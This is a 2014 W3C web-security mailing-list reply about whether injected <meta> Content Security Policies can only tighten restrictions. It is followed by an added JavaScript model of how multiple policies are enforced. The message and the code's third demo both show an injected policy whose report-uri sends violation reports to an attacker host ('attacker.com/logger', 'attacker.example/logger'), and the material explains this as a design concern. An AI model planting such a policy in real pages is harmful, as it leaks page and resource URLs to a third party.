I am not sure if a meta tag policy only constrains further. Joel started a related thread a while back [1], and I had mentioned a couple of examples where (it seemed to me) an injected policy could add behavior instead of just constraining further [2]. Joel also mentioned that he was philosophically opposed to making CSP be "only allows you to constrain further" [3].

To mitigate this concern, should we try to limit what meta tag policies can do? For example, do we want to allow an injected policy to add a new report-uri to attacker.com/logger?

Regards
Dev

[1] http://lists.w3.org/Archives/Public/public-webappsec/2014Mar/0001.html
[2] http://lists.w3.org/Archives/Public/public-webappsec/2014Mar/0008.html
[3] http://lists.w3.org/Archives/Public/public-webappsec/2014Mar/0020.html

On 11 June 2014 09:00, Daniel Veditz <dveditz@mozilla.com> wrote:
> On 6/11/2014 12:20 AM, Mike West wrote:
>
>> Thanks Dan. I agree with your analysis, and I appreciate you withdrawing
>> your objection.
>>
>> I've made this change in
>> https://github.com/w3c/webappsec/commit/f697c40eea84b6c57480c0e3783993a47ebdc3d5
>>
>> WDYT?
>>
>
> To be clear, your change does two things and we were mainly talking about
> the first:
> * allows use of both HTTP and <meta> CSP
> * allows use of multiple <meta> CSP
>
> The arguments against (and in favor of) multiple <meta> CSP are pretty
> much the same as the arguments for and against allowing a combination of
> header and <meta> policies. "It's useful, and why not since it can only
> tighten policies" vs. "Injection bug in site might be used to circumvent a
> feature whose main purpose assumes you need protection from injection
> bugs". I'm not objecting to the change, just announcing my intention to sit
> in the corner and fret about the possibility.
>
> -Dan Veditz
>

Received on Wednesday, 11 June 2014 17:33:43 UTC
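The following is an added illustration, not code from the thread or from the w3c/webappsec repository. It is a toy JavaScript model of the user-agent behaviour the two messages argue about: when a header policy and a <meta> policy are both active, every policy is enforced on its own, so a load must be allowed by all of them (an injected policy cannot loosen the header), but each policy that blocks a load sends a violation report to its own report-uri (an injected policy can add a reporting endpoint). The hostnames app.example, cdn.example.com, evil.example and attacker.example, the policy strings, and the limited set of source expressions handled are all constructed for the example.

```javascript
// Added example (not part of the original thread). Models CSP's
// "every delivered policy is enforced independently" rule for a handful
// of directives. Assumptions: well-formed policy strings; only 'self',
// 'none', '*', scheme-only ("https:"), host ("cdn.example.com",
// "*.example.com") and origin ("https://cdn.example.com") sources.
function parsePolicy(text) {
  const policy = {};
  for (const token of text.split(';')) {
    const parts = token.trim().split(/\s+/).filter(Boolean);
    if (parts.length === 0) continue;
    const [name, ...values] = parts;
    policy[name.toLowerCase()] = values;
  }
  return policy;
}

// Does one source expression match `url` for a document at origin `self`?
function sourceMatches(expr, url, self) {
  if (expr === "'none'") return false;
  if (expr === "'self'") return url.origin === self.origin;
  if (expr === '*') return !['data:', 'blob:', 'filesystem:'].includes(url.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return url.protocol === expr.toLowerCase();
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+))?$/i.exec(expr);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && url.protocol !== scheme.toLowerCase() + ':') return false;
  const h = host.toLowerCase();
  if (wildcard ? !url.hostname.endsWith('.' + h) : url.hostname !== h) return false;
  if (port && url.port !== port) return false;
  return true;
}

// Does a single policy allow `url` under `directive`? Falls back to
// default-src; a policy that governs neither has no opinion and allows.
function policyAllows(policy, directive, url, self) {
  const sources = policy[directive] ?? policy['default-src'];
  if (sources === undefined) return true;
  return sources.some(expr => sourceMatches(expr, url, self));
}

// Enforce every active policy. The load is allowed only if all policies
// allow it; each blocking policy reports to its own report-uri endpoints
// with the same fields a real violation report would carry.
function evaluateLoad(policyTexts, directive, urlText, selfOrigin) {
  const self = new URL(selfOrigin);
  const url = new URL(urlText, self.href);
  const reports = [];
  let allowed = true;
  for (const text of policyTexts) {
    const policy = parsePolicy(text);
    if (policyAllows(policy, directive, url, self)) continue;
    allowed = false;
    for (const endpoint of policy['report-uri'] ?? []) {
      reports.push({
        to: new URL(endpoint, self.href).href,
        'document-uri': self.href,
        'blocked-uri': url.href,
        'violated-directive': directive,
      });
    }
  }
  return { allowed, reports };
}

// Constructed scenario: the site's header policy plus one injected <meta>.
const SELF = 'https://app.example/';
const HEADER = "script-src 'self' https://cdn.example.com; report-uri /csp-report";

function demo() {
  // 1. Injected policy tries to loosen script-src: the header still blocks,
  //    and only the header's own endpoint is told about it.
  const loosen = evaluateLoad([HEADER, 'script-src *'],
    'script-src', 'https://evil.example/x.js', SELF);
  // 2. A legitimate script is still fine with both policies present.
  const legit = evaluateLoad([HEADER, 'script-src *'],
    'script-src', 'https://cdn.example.com/lib.js', SELF);
  // 3. Injected policy adds behaviour: it blocks a load the header never
  //    governed and sends the report (document and blocked URL) elsewhere.
  const exfil = evaluateLoad(
    [HEADER, "img-src 'none'; report-uri https://attacker.example/logger"],
    'img-src', '/private/photo.png', SELF);
  return { loosen, legit, exfil };
}

console.log(JSON.stringify(demo(), null, 2));
```

Case 3 is the situation the message above asks about: the injected policy cannot widen anything the header restricts, yet it still gains a report channel that receives the document URL and every URL it chooses to block. Separately from this example, note that the CSP Level 2 specification later addressed exactly this by ignoring report-uri (along with frame-ancestors and sandbox) in policies delivered via <meta>.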